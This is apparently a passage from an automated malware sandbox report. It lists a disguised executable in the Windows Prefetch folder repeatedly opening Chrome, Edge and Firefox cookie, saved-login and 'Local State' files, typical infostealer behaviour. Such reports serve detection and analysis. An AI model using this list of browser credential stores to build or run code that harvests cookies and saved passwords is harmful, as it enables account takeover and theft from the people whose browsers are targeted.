                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
